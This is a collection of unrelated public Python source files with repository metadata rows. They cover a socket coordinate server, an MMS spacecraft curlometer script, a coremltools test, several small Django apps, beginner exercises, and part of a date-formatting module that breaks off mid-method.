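def serve_once(host='127.0.0.1', port=1233, target=(12.34, 56.78)):
    server = socket.socket()
    server.bind((host, port))
    server.listen(1)
    conn, _ = server.accept()
    req = int.from_bytes(conn.recv(2), 'big')
    if req == 0:    # client requests the stored target
        conn.send(struct.pack('f', target[0]))
        conn.send(struct.pack('f', target[1]))
    elif req == 1:  # client sends a new target
        [lat] = struct.unpack('f', conn.recv(4))
        [lon] = struct.unpack('f', conn.recv(4))
        print(lat, lon)
    conn.close()
    server.close()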
1d6ab9387bb79ad61478237022abe9051420f9df | e523770b755a43accfa02ee3ea86af4aeac438e7 | /0_startcamp/day1/list1.py | fe1002030eee81ac5ee114d5bc0f89f22c828945 | [] | no_license | AhnDogeon/TIL | a21f8e70bdd917fd1ec58d55955fa6b3e70c4ca4 | b4ae78b7c6c08ab6076312ba3b44493248ab5195 | refs/heads/master | 2022-11-30T10:14:32.880643 | 2021-02-11T16:09:27 | 2021-02-11T16:09:27 | 162,255,917 | 1 | 1 | null | 2022-11-22T03:46:04 | 2018-12-18T08:32:42 | Jupyter Notebook | UTF-8 | Python | false | false | 201 | py | numbers = [1, 2, 3] # 변수 이름은 뜻을 담아서 짓자!
family = ['mom', 1.64, 'dad', 1.75, 'sister', 1.78, True]  # a list can mix value types
mcu = [
['ironman', 'captain'],
['xmen','deadpool'],
['spiderman']
]
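# --- Added example (not in the original file): indexing the nested list ---
print(mcu[0][1])   # 'captain' -- row 0, item 1
print(mcu[2][0])   # 'spiderman'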
ef4059d5bcb4e277045e6b56baedb795edbd75a0 | 29d2ec5d980fc950d3404fe6e1bce36a6a797af8 | /mms_curlometer.py | 383871c028c4921b8ff0ec56ef57213767c1812d | [] | no_license | KBergst/mms-structure-finder | 9d7b6f3fb1e608ff12052f9d5fc20fcb39ea48e7 | 6a913b1a672dcb670dcde0007741e1fb2750a9dc | refs/heads/master | 2023-07-11T19:51:05.823863 | 2019-07-08T15:15:32 | 2019-07-08T15:15:32 | 190,035,486 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,819 | py | #full_curlometer.py code adapted for use with MMS CDF files
#import sys #for stopping while debugging
import numpy as np # for matrix calculations
import math # for pi and sqrt
#import glob # for sensible listdir()
import cdflib #for importing cdf files
from copy import deepcopy # for obtaining variables in CEF files
#import matplotlib.pyplot as plt # for plotting
import datetime as dt # for dates
from matplotlib import dates # for formatting axes
import pytz #for my own time stuff
import scipy.interpolate as interp #for interpolating to MMS1 timeseries
import os #for generalization to all systems
#user created modules:
import mmstimes as mt
# User-defined variables:
# Base path:
path = os.getcwd()
# File location key name:
loc_file = r"key_for_curlometer.txt"
# Output file location key name:
out_loc_file = r"curlometer_files.txt"
#directories for outputs, input data:
outpath="Curlometer_data"
datpath="MMS"
# output file start for output current density (minus number):
outfile = os.path.join(path,outpath,"output")
# output file location key (full path)
keyfile = os.path.join(path,outpath,out_loc_file)
# Plot filenames:
BJQFileName = 'test_BJQ.png'
GeomFileName = 'test_Geom.png'
# X-axis labels:
XAxisLabel = 'Time on 26 July 2017'
# Desired resolution of data for the curlometer calculation
window = 1/128 # in seconds, 0.2 = minimum FOR CLUSTER
def filenames_get(name_list_file):
name_list=[]
with open(name_list_file,"r") as name_file_obj: #read-only access
for line in name_file_obj:
line_clean =line.rstrip('\n') #removes newline chars from lines
name_list.append(line_clean)
return name_list
def get_cdf_var(filename,varnames):
"""
pulls particular variables from a CDF
note: if variable has more than one set of data (E.g. b-field with x,y,z
components) it will be necessary to format the data by reshaping the array
from a 1D to a 2D array
(may find workaround/better way later)
"""
    cdf_file=cdflib.CDF(filename) #cdflib.CDF takes only the path; each variable
    #is queried individually below
    data=[]
    for varname in varnames:
        var_data=np.array(cdf_file.varget(varname))
        data.append(var_data)
return data
def time_converter(time_nanosecs):
"""
converts MMS CDF times (nanoseconds, TT 2000) to
matplotlib datetime objects
"""
#TODO: make sure this thing is working correctly!!!
start_date=dt.datetime(2000,1,1,hour=11,minute=58,second=55,
microsecond=816000)
# see https://aa.usno.navy.mil/faq/docs/TT.php for explanation of
# this conversion time
start_num=dates.date2num(start_date) #num of start date of time data
    fudge_factor=5/60/60/24 #a 5 s correction, expressed in days
    #the 5 s offset matches the leap seconds added to UTC between 2000 and the
    #2017 epoch of these data, which TT (the basis of TT2000) does not observe
time_days=time_nanosecs/1e9/60/60/24 #convert nanoseconds to days
time_num=time_days+start_num-fudge_factor #convert TT2000 to matplotlib num time
times=[]
if time_num.size>1:
for t in time_num:
t_dt=dates.num2date(t) #conversion to datetime object
t_utc=t_dt.astimezone(pytz.utc) #officially set timezone to UTC
times.append(t_utc)
return times
else:
t_dt=dates.num2date(time_num) #conversion to datetime object
t_utc=t_dt.astimezone(pytz.utc) #officially set timezone to UTC
return t_utc
'''The Curlometer Function'''
def delta(ref, i):
delrefi = i - ref
return delrefi
def curlometer(d1, d2, d3, d4):
km2m = 1e3
nT2T = 1e-9
mu0 = (4*math.pi)*1e-7
C1R = np.array([d1[3], d1[4], d1[5]])*km2m
C1B = np.array([d1[0], d1[1], d1[2]])*nT2T
C2R = np.array([d2[3], d2[4], d2[5]])*km2m
C2B = np.array([d2[0], d2[1], d2[2]])*nT2T
C3R = np.array([d3[3], d3[4], d3[5]])*km2m
C3B = np.array([d3[0], d3[1], d3[2]])*nT2T
C4R = np.array([d4[3], d4[4], d4[5]])*km2m
C4B = np.array([d4[0], d4[1], d4[2]])*nT2T
delB14 = delta(C4B, C1B)
delB24 = delta(C4B, C2B)
delB34 = delta(C4B, C3B)
delR14 = delta(C4R, C1R)
delR24 = delta(C4R, C2R)
delR34 = delta(C4R, C3R)
# J
# Have to 'convert' this to a matrix to be able to get the inverse.
R = np.matrix(([np.cross(delR14, delR24), np.cross(delR24, delR34),
np.cross(delR14, delR34)]))
Rinv = R.I
# I(average) matrix:
Iave = ([np.dot(delB14, delR24) - np.dot(delB24, delR14)],
[np.dot(delB24, delR34) - np.dot(delB34, delR24)],
[np.dot(delB14, delR34) - np.dot(delB34, delR14)])
JJ = (Rinv*Iave)/mu0
# div B
lhs = np.dot(delR14, np.cross(delR24, delR34))
rhs = np.dot(delB14, np.cross(delR24, delR34)) + \
np.dot(delB24, np.cross(delR34, delR14)) + \
np.dot(delB34, np.cross(delR14, delR24))
divB = abs(rhs)/abs(lhs)
# div B / curl B
curlB = JJ*mu0
magcurlB = math.sqrt(curlB[0]**2 + curlB[1]**2 + curlB[2]**2)
divBbycurlB = divB/magcurlB
return [JJ, divB, divBbycurlB]
# End of curlometer function
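# --- Added sanity check (not in the original script). For a uniform-gradient ---
# --- field B = (0, 0, x) in nT with positions in km, curl(B) = (0, -1, 0)    ---
# --- nT/km, so Jy should be about -1e-12/mu0 ~ -8.0e-7 A/m^2 and the         ---
# --- divB/|curlB| quality ratio should be ~0.                                ---
test_pos = [[0., 0., 0.], [100., 0., 0.], [0., 100., 0.], [0., 0., 100.]]
test_in = [[0., 0., p[0]] + p for p in test_pos] #each entry: [Bx, By, Bz, x, y, z]
Jtest, divBtest, ratiotest = curlometer(*test_in)
print('curlometer check: J =', np.ravel(Jtest), ', divB/|curlB| =', ratiotest)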
'''Read in all the data using CEFLIB.read '''
MMS_num = [str(x) for x in range(1,5)]
MMS=['MMS'+str(x) for x in range(1,5)]
loc_file_whole=os.path.join(path,loc_file)
bfield_files=filenames_get(loc_file_whole)
#iterating over each time interval
for file_num,file in enumerate(bfield_files):
time = {}
time_pos = {} #because MMS has different time series for position data
B = {}
pos = {}
for n,M_num in enumerate(MMS_num):
file_whole=os.path.join(path,datpath,M_num,"mms"+M_num+file)
tmp1,tmp2,misshape_1,misshape_2=get_cdf_var(file_whole,
['Epoch','Epoch_state',
'mms'+M_num+'_fgm_b_gsm_brst_l2',
'mms'+M_num+'_fgm_r_gsm_brst_l2'])
tmp3=misshape_1.reshape(misshape_1.size//4,4)
tmp4=misshape_2.reshape(misshape_2.size//4,4)
time[MMS[n]] = deepcopy(tmp1) #in NANOSECONDS
time_pos[MMS[n]]=deepcopy(tmp2)
B[MMS[n]] = deepcopy(tmp3)
pos[MMS[n]] = deepcopy(tmp4)
'''Align all to MMS1 time coordinates using linear interpolation '''
clean = {}
#interpolate all data for MMS 2,3,4 (yes I know it is a mess)
B_interp=[]
pos_interp=[]
for n in range(1,4):
B_interp.append(interp.interp1d(time[MMS[n]],B[MMS[n]],kind='linear',
axis=0,assume_sorted=True))
for n in range(4):
pos_interp.append(interp.interp1d(time_pos[MMS[n]],pos[MMS[n]],kind='linear',
axis=0,assume_sorted=True))
tarr=[] #array of good times (helpful to have outside dict)
for i,t in enumerate(time[MMS[0]]):
if ((time[MMS[1]]-t>0).all() or (time[MMS[2]]-t>0).all() or
(time[MMS[3]]-t>0).all()):
#time is outside of bounds of interpolation for at least one craft
continue
if ((time[MMS[1]]-t<0).all() or (time[MMS[2]]-t<0).all() or
(time[MMS[3]]-t<0).all()):
#time is outside of bounds of interpolation for at least one craft
continue
clean[t]={}
tarr.append(t)
for j,M_str in enumerate(MMS):
if M_str =="MMS1":
clean[t][M_str] = [B[M_str][i][0],
B[M_str][i][1],
B[M_str][i][2],
pos_interp[j](t)[0],
pos_interp[j](t)[1],
pos_interp[j](t)[2]]
else:
clean[t][M_str] = [B_interp[j-1](t)[0],
B_interp[j-1](t)[1],
B_interp[j-1](t)[2],
pos_interp[j](t)[0],
pos_interp[j](t)[1],
pos_interp[j](t)[2]]
mintime, maxtime = min(clean.keys()), max(clean.keys())
# Time array (min, max, step)
nwin = len(tarr)
Jave = np.zeros(nwin, dtype = [('time', float),('Jx', float),
('Jy', float),('Jz', float),
('divB', float),
('divBcurlB', float)])
for i,t in enumerate(clean):
if len(clean[t]) == 4:
onej = curlometer(clean[t]['MMS1'],clean[t]['MMS2'],
clean[t]['MMS3'],clean[t]['MMS4'])
Jave['time'][i] = t #in nanosecs
Jave['Jx'][i] = onej[0][0]
Jave['Jy'][i] = onej[0][1]
Jave['Jz'][i] = onej[0][2]
Jave['divB'][i] = onej[1]
Jave['divBcurlB'][i] = onej[2]
else:
Jave['time'][i] = t
Jave['Jx'][i] = np.nan
Jave['Jy'][i] = np.nan
Jave['Jz'][i] = np.nan
Jave['divB'][i] = np.nan
Jave['divBcurlB'][i] = np.nan
'''Write all results out to file, tarr is already sorted'''
with open(outfile+str(file_num)+".txt", 'w') as f:
for j in Jave:
t_dt=mt.TTtime2datetime(j['time'])
time_string=mt.datetime2str(t_dt)
outstring = "{},{},{},{},{}\n".format(time_string,j['Jx'],
j['Jy'],j['Jz'],j['divBcurlB'])
f.write(outstring)
''' Write out what the output files are to the output key file '''
with open(keyfile, 'w') as f:
for file_num,file in enumerate(bfield_files):
outstring=outfile+str(file_num)+".txt"+'\n'
f.write(outstring)
#TODO: Possibly try different interpolation styles than linear?
972e96e0720ba97f5e6daa01c0c6ae41da58743c | 40195e6f86bf8620850f0c56e98eae5693e88277 | /coremltools/converters/mil/frontend/tensorflow2/ssa_passes/test_v2_passes.py | 8b9ec829878c1c138997390b2bd3ce30180b7664 | [
"MIT",
"BSD-3-Clause"
] | permissive | apple/coremltools | 009dfa7154d34cab8edcafa618e689e407521f50 | feed174188f7773631a3d574e1ff9889a135c986 | refs/heads/main | 2023-09-01T23:26:13.491955 | 2023-08-31T18:44:31 | 2023-08-31T18:44:31 | 95,862,535 | 3,742 | 705 | BSD-3-Clause | 2023-09-14T17:33:58 | 2017-06-30T07:39:02 | Python | UTF-8 | Python | false | false | 1,850 | py | # Copyright (c) 2020, Apple Inc. All rights reserved.
#
# Use of this source code is governed by a BSD-3-clause license that can be
# found in the LICENSE.txt file or at https://opensource.org/licenses/BSD-3-Clause
import copy
import numpy as np
from coremltools.converters.mil.mil import Builder as mb
from coremltools.converters.mil.mil import types
from coremltools.converters.mil.mil.passes.pass_registry import PASS_REGISTRY
from coremltools.converters.mil.testing_utils import (assert_model_is_valid,
assert_same_output_names)
np.random.seed(1984)
validate_model = True
def test_remove_vacuous_cond():
@mb.program(
input_specs=[
mb.TensorSpec(shape=(1,), dtype=types.bool),
mb.TensorSpec(shape=(2, 3)),
]
)
def prog(a, b):
def then_branch():
return mb.identity(x=b)
def else_branch():
return mb.identity(x=b)
pred = mb.squeeze(x=a)
return mb.cond(pred=pred, _true_fn=then_branch, _false_fn=else_branch)
cond_op = prog.find_ops(op_type="cond", exactly_one=True)[0]
original_cond_op_name = cond_op.name
assert len(cond_op.blocks[0].operations) == 1
assert len(cond_op.blocks[1].operations) == 1
assert cond_op.blocks[0].operations[0].op_type == "identity"
assert cond_op.blocks[1].operations[0].op_type == "identity"
prev_prog = copy.deepcopy(prog)
PASS_REGISTRY["tensorflow2::remove_vacuous_cond"](prog)
assert_same_output_names(prev_prog, prog)
cond_op = prog.find_ops(op_type="cond")
assert len(cond_op) == 0
identity_op = prog.find_ops(prefix=original_cond_op_name, exactly_one=True)[0]
assert identity_op.op_type == "identity"
if validate_model:
assert_model_is_valid(prog, {"a": (1,), "b": (2, 3)})
7a6926b4dee56ee9dd1021485553feb60dee8c57 | e99017069ca8bed159f15a9decbbe6710ad87b2a | /troof/settings.py | 288b42c7dd9bffc910a7d1b364950f4369740113 | [] | no_license | jpkim921/trooff | 0d145deea519337eab886e25ca2cd27ac80481fd | 37920d67e54681df6ff765c6dba1ff20791f7dd1 | refs/heads/master | 2020-12-04T17:48:38.760280 | 2020-05-19T14:39:15 | 2020-05-19T14:39:15 | 231,856,747 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,401 | py | from .additional_settings import *
"""
Django settings for troof project.
Generated by 'django-admin startproject' using Django 3.0.1.
For more information on this file, see
https://docs.djangoproject.com/en/3.0/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.0/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.0/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
# SECRET_KEY = 'haha'
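# (editor's note: the real SECRET_KEY is presumably supplied by the star-import
# from additional_settings above, keeping it out of version control)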
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
# "accounts",
'accounts.apps.AccountsConfig',
"pages",
"donations",
# "donors"
"products",
"django_filters",
"store",
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'troof.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [os.path.join(BASE_DIR, "templates")],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'troof.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.0/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/3.0/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.0/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.0/howto/static-files/
STATIC_URL = '/static/'
STATICFILES_DIRS = [
os.path.join(BASE_DIR, "static"),
]
MEDIA_URL = '/images/'
MEDIA_ROOT = os.path.join(BASE_DIR, 'static/images')
8aa0f39e07e9651a42f290f8faecb7f2935690eb | 330eb2728ecbe6c6a76e95e34ded5c073c8d2af3 | /sonora_portal001/artistas/views.py | 11b6ca60e40a56c727d70bdc5c0c6a86e2c239da | [] | no_license | Vieceli/sonora_portal001 | ca503b82b69f51e23399d50ae68f1e765144628a | ee282fa2e35cc61abf0393f8f0aebac91eff2e22 | refs/heads/master | 2021-01-23T22:53:11.536090 | 2011-07-20T18:00:07 | 2011-07-20T18:00:07 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,266 | py | # Create your views here.
from artistas.forms import ArtistaForm
from django.http import HttpResponseRedirect
from django.shortcuts import render_to_response, get_object_or_404
from django.template.context import RequestContext
from artistas.models import Artista
def artistas(request,template_name):
usuario=request.user
noticias = Artista.objects.all().order_by('-atualizado_em')
return render_to_response(template_name, locals(), context_instance=RequestContext(request))
def artista(request,template_name, artista_slug):
usuario=request.user
# if request.method == 'GET':
# GET = request.GET
# if GET.has_key('a'):
# form = ArtistaForm(request.GET'
noticia = get_object_or_404(Artista, slug=artista_slug)
noticias_recentes = Artista.objects.all().order_by('-atualizado_em')
if request.method == 'POST':
POST=request.POST
print POST
artista_form = ArtistaForm(request.POST)
if artista_form.is_valid():
artista_form.save()
return HttpResponseRedirect('/Obrigado/')
else:
artista_form = ArtistaForm()
return render_to_response(template_name, locals(), context_instance=RequestContext(request))
e61da909e3d710561f6645f4e8ff84bd9716d626 | 8db7e81c480dc66c8e31ccdd30fd979cc0b9e40e | /Rating Application/Untapped Rating Interface/run_program.py | b9839f470c5eb47bc12761fa73c7688f4ddf7cbc | [] | no_license | Timpryor91/beer_style_rating | cb304e8a4e32c201940a16eafc3183965d4c51a5 | e738f1a9c56efb9c505a88770ad52ee8059fd1e0 | refs/heads/master | 2023-05-13T23:32:31.021584 | 2021-05-28T12:43:05 | 2021-05-28T12:43:05 | 340,421,904 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 615 | py | # -*- coding: utf-8 -*-
"""
@author: timpr
"""
# from tool_interface import initiate_interface
from tool_interface import Interface
from modules.beer_data import import_beer_data
import tkinter as tk
# Run the application
if __name__ == "__main__":
# Import beer style names and statistics
style_avgs, style_stdevs, all_beers = import_beer_data()
# # Launch interface
# initiate_interface(style_avgs, style_stdevs, all_beers)
#Initiate tool interface
window = tk.Tk()
tool_interface = Interface(window, style_avgs, style_stdevs, all_beers)
    window.mainloop()
2f2a5ca2e0a1306df87c7be41fa4cd4ff935189e | c84a552307fa5aee2aa3aa086171c06b8d83390a | /quiz/views/contest.py | db3950e0f06ee31bc860bf53f3dc7378bb94cae1 | [] | no_license | dien-hust63/Django-QuizSite | a00a05473b57b43577e981048f4800cf657783f4 | c69c30b8b525a17ac6f8d5f4b3fcdcb76f530a86 | refs/heads/main | 2023-05-03T18:48:29.780670 | 2021-05-23T04:19:27 | 2021-05-23T04:19:27 | 370,032,713 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,842 | py | from django.shortcuts import render, redirect
from quiz.models import *
from django.views import generic
from django.shortcuts import get_object_or_404
from quiz.forms import QuizTestForm, CustomUserCreationForm, QuizForm
from django.contrib.auth import authenticate, login
from django.contrib import messages
from django.contrib.auth.models import Group
from django.contrib.auth.decorators import login_required
from django.views.generic.edit import CreateView, DeleteView, UpdateView
from django.urls import reverse
import json
@login_required(login_url = 'login')
def quizes(request, pk):
category = Category.objects.get(pk = pk)
quiz_list = Quiz.objects.filter(category=category)
context = {
'category': category,
'quiz_list' : quiz_list,
}
return render(request, 'contest/contest_quiz_list.html', context = context)
@login_required(login_url = 'login')
def quiz_confirm(request, category_id, quiz_id):
quiz = get_object_or_404(Quiz, pk=quiz_id)
context = {
'quiz': quiz,
}
return render(request, 'contest/contest_quiz_confirm.html', context = context)
@login_required(login_url = 'login')
def quiz_detail(request, category_id, quiz_id):
quiz = get_object_or_404(Quiz, pk=quiz_id)
questions = Question.objects.filter(quiz=quiz)
if request.method == 'POST':
form = QuizTestForm(request.POST, extra=questions, detail_result=0)
if form.is_valid():
final_result = save_result(request, form, quiz, questions)
save_detail_result(form, questions, final_result)
context = {
'result': final_result,
'quiz': quiz,
}
return redirect(reverse('results', kwargs={'result_id':final_result.id}))
else:
form = QuizTestForm(extra=questions,detail_result=0)
context = {
'form':form,
'quiz':quiz,
}
return render(request, 'contest/contest_quiz_detail.html', context = context)
def show_results(request, result_id):
result = Result.objects.get(id = result_id)
quiz = result.quiz
context = {
'result':result,
'quiz':quiz
}
return render(request, 'contest/contest_results.html', context = context )
def show_detail_result(request, result_id):
result = get_object_or_404(Result, id = result_id)
# detail_result = get_object_or_404(DetailResult, result=result)
questions = Question.objects.filter(quiz=result.quiz)
form = QuizTestForm(extra=questions, detail_result=1)
context = {
'form':form,
}
return render(request, 'contest/contest_detail_result.html', context = context)
def save_result(request, form, quiz, questions):
results = 0
    for question in questions:
        correct_answers = question.get_correct_answer
        user_answers = form.cleaned_data[f"{question.id}"]
        correct_answers_len = len(correct_answers)
        if correct_answers_len == len(user_answers):
            for i in range(len(correct_answers)):
                if str(correct_answers[i]) != user_answers[i]:
                    break
            else:
                # only reached when no break fired, i.e. every answer matched;
                # the original added the score even after a mismatch broke out
                results = results + question.score
final_result = Result.objects.create(
final_score = results,
quiz = quiz,
user = request.user
)
final_result.save()
return final_result
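# --- Added note (not in the original file): the matching in save_result is ---
# --- order-sensitive; correct ['2', '7'] vs submitted ['7', '2'] earns no  ---
# --- score. Sorting both lists before comparing would relax this.          ---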
def save_detail_result(form, questions, final_result):
for question in questions:
user_answers = form.cleaned_data[f'{question.id}']
for answer in user_answers:
detail_result = DetailResult.objects.create(
result= final_result,
question=question,
answer = answer
)
detail_result.save()
return None
#TODO: handle when timeout
#check register
#show result
1c296da03be34c0ca03a869d860edac26218380f | 6f2380fe4087783603a36ce966ab9b5e99ac4cbb | /demo1/booktest/migrations/0006_auto_20190708_1351.py | 83b1a21d8b7535ca7bef558a2df9a3dfcc4021b3 | [] | no_license | zhlxcl/Python1904xcl | aab0d4989d9065bff5d5334a1a1e1188cbd3619d | f4cc21ed0fb6d40349490a084b983b4e897c8d91 | refs/heads/master | 2022-12-14T20:12:16.014524 | 2019-07-19T08:47:19 | 2019-07-19T08:47:19 | 194,625,840 | 0 | 0 | null | 2022-11-22T04:07:44 | 2019-07-01T07:53:59 | JavaScript | UTF-8 | Python | false | false | 783 | py | # Generated by Django 2.2.3 on 2019-07-08 05:51
from django.db import migrations, models
import django.db.models.manager
class Migration(migrations.Migration):
dependencies = [
('booktest', '0005_heroinfo_type'),
]
operations = [
migrations.CreateModel(
name='Ads',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('desc', models.CharField(max_length=20)),
('img', models.ImageField(upload_to='ads')),
],
),
migrations.AlterModelManagers(
name='heroinfo',
managers=[
('myobjects', django.db.models.manager.Manager()),
],
),
]
15c40d56d32074dfb192bd80aec27d245d6634b0 | 027698c1805955cb7222f682a0b3939e0f8405a1 | /dataType/dict_p1.py | a517ae07cd48e935d0bd71680f8585213ef042aa | [] | no_license | mrbartrns/introducing-to-CS | e0c114ce175169d6750bdee9fd8ddf3ad264f18e | 2fceef111ebed0ee0e8266997973dd410f45e7fa | refs/heads/master | 2022-12-07T23:46:33.329046 | 2020-08-30T14:39:04 | 2020-08-30T14:39:04 | 280,989,138 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,051 | py | animals = { 'a': ['aadvrark'], 'b':['baboon'], 'c':['coati']}
animals['d'] = ['donkey']
animals['d'].append('dog')
animals['d'].append('dingo')
def how_many(animals):
count = 0
for k in animals:
count += len(animals[k])
return count
def biggest(aDict):
'''
aDict: A dictionary, where all the values are lists.
returns: The key with the largest number of values associated with it
'''
count = 0
biggestKey = ''
if aDict == {}:
return None
else:
for k in aDict:
if count < len(aDict[k]):
count = len(aDict[k])
biggestKey = k
return biggestKey
print(biggest({}))
# difference between a list and an array: a list can hold items of several
# different data types, while an array holds only one type
def fib_efficient(n:int, d:dict): #n is for key in dict
ans = 0
if n in d:
return d[n]
else:
ans += fib_efficient(n - 1, d) + fib_efficient(n - 2, d)
d[n] = ans
return ans
d = {1: 1, 2: 2}
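# --- Added example (not in the original file): with the memo d seeded above, ---
# --- this memoized Fibonacci runs in linear time.                            ---
print(fib_efficient(10, d))  # 89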
ca756c26eab8193970e8afce664fde448e00dc44 | e845f7f61ff76b3c0b8f4d8fd98f6192e48d542a | /djangocg/utils/dateformat.py | 7d4066b71cc299624e0bb228c36944639457df5d | [
"BSD-3-Clause"
] | permissive | timothyclemans/djangocg | fd150c028013cb5f53f5a3b4fdc960a07fdaaa78 | 52cf28e046523bceb5d436f8e6bf61e7d4ba6312 | refs/heads/master | 2021-01-18T13:20:13.636812 | 2012-08-31T23:38:14 | 2012-08-31T23:38:14 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,943 | py | """
PHP date() style date formatting
See http://www.php.net/date for format strings
Usage:
>>> import datetime
>>> d = datetime.datetime.now()
>>> df = DateFormat(d)
>>> print(df.format('jS F Y H:i'))
7th October 2003 11:39
>>>
"""
from __future__ import unicode_literals
import re
import time
import calendar
import datetime
from djangocg.utils.dates import MONTHS, MONTHS_3, MONTHS_ALT, MONTHS_AP, WEEKDAYS, WEEKDAYS_ABBR
from djangocg.utils.tzinfo import LocalTimezone
from djangocg.utils.translation import ugettext as _
from djangocg.utils.encoding import force_text
from djangocg.utils import six
from djangocg.utils.timezone import is_aware, is_naive
re_formatchars = re.compile(r'(?<!\\)([aAbBcdDeEfFgGhHiIjlLmMnNoOPrsStTUuwWyYzZ])')
re_escaped = re.compile(r'\\(.)')
class Formatter(object):
def format(self, formatstr):
pieces = []
for i, piece in enumerate(re_formatchars.split(force_text(formatstr))):
if i % 2:
pieces.append(force_text(getattr(self, piece)()))
elif piece:
pieces.append(re_escaped.sub(r'\1', piece))
return ''.join(pieces)
class TimeFormat(Formatter):
def __init__(self, t):
self.data = t
def a(self):
"'a.m.' or 'p.m.'"
if self.data.hour > 11:
return _('p.m.')
return _('a.m.')
def A(self):
"'AM' or 'PM'"
if self.data.hour > 11:
return _('PM')
return _('AM')
def B(self):
"Swatch Internet time"
raise NotImplementedError
def f(self):
"""
Time, in 12-hour hours and minutes, with minutes left off if they're
zero.
Examples: '1', '1:30', '2:05', '2'
Proprietary extension.
"""
if self.data.minute == 0:
return self.g()
return '%s:%s' % (self.g(), self.i())
def g(self):
"Hour, 12-hour format without leading zeros; i.e. '1' to '12'"
if self.data.hour == 0:
return 12
if self.data.hour > 12:
return self.data.hour - 12
return self.data.hour
def G(self):
"Hour, 24-hour format without leading zeros; i.e. '0' to '23'"
return self.data.hour
def h(self):
"Hour, 12-hour format; i.e. '01' to '12'"
return '%02d' % self.g()
def H(self):
"Hour, 24-hour format; i.e. '00' to '23'"
return '%02d' % self.G()
def i(self):
"Minutes; i.e. '00' to '59'"
return '%02d' % self.data.minute
def P(self):
"""
Time, in 12-hour hours, minutes and 'a.m.'/'p.m.', with minutes left off
if they're zero and the strings 'midnight' and 'noon' if appropriate.
Examples: '1 a.m.', '1:30 p.m.', 'midnight', 'noon', '12:30 p.m.'
Proprietary extension.
"""
if self.data.minute == 0 and self.data.hour == 0:
return _('midnight')
if self.data.minute == 0 and self.data.hour == 12:
return _('noon')
return '%s %s' % (self.f(), self.a())
def s(self):
"Seconds; i.e. '00' to '59'"
return '%02d' % self.data.second
def u(self):
"Microseconds"
return self.data.microsecond
class DateFormat(TimeFormat):
year_days = [None, 0, 31, 59, 90, 120, 151, 181, 212, 243, 273, 304, 334]
def __init__(self, dt):
# Accepts either a datetime or date object.
self.data = dt
self.timezone = None
if isinstance(dt, datetime.datetime):
if is_naive(dt):
self.timezone = LocalTimezone(dt)
else:
self.timezone = dt.tzinfo
def b(self):
"Month, textual, 3 letters, lowercase; e.g. 'jan'"
return MONTHS_3[self.data.month]
def c(self):
"""
ISO 8601 Format
Example : '2008-01-02T10:30:00.000123'
"""
return self.data.isoformat()
def d(self):
"Day of the month, 2 digits with leading zeros; i.e. '01' to '31'"
return '%02d' % self.data.day
def D(self):
"Day of the week, textual, 3 letters; e.g. 'Fri'"
return WEEKDAYS_ABBR[self.data.weekday()]
def e(self):
"Timezone name if available"
try:
if hasattr(self.data, 'tzinfo') and self.data.tzinfo:
# Have to use tzinfo.tzname and not datetime.tzname
                # because datetime.tzname does not expect Unicode
return self.data.tzinfo.tzname(self.data) or ""
except NotImplementedError:
pass
return ""
def E(self):
"Alternative month names as required by some locales. Proprietary extension."
return MONTHS_ALT[self.data.month]
def F(self):
"Month, textual, long; e.g. 'January'"
return MONTHS[self.data.month]
def I(self):
"'1' if Daylight Savings Time, '0' otherwise."
if self.timezone and self.timezone.dst(self.data):
return '1'
else:
return '0'
def j(self):
"Day of the month without leading zeros; i.e. '1' to '31'"
return self.data.day
def l(self):
"Day of the week, textual, long; e.g. 'Friday'"
return WEEKDAYS[self.data.weekday()]
def L(self):
"Boolean for whether it is a leap year; i.e. True or False"
return calendar.isleap(self.data.year)
def m(self):
"Month; i.e. '01' to '12'"
return '%02d' % self.data.month
def M(self):
"Month, textual, 3 letters; e.g. 'Jan'"
return MONTHS_3[self.data.month].title()
def n(self):
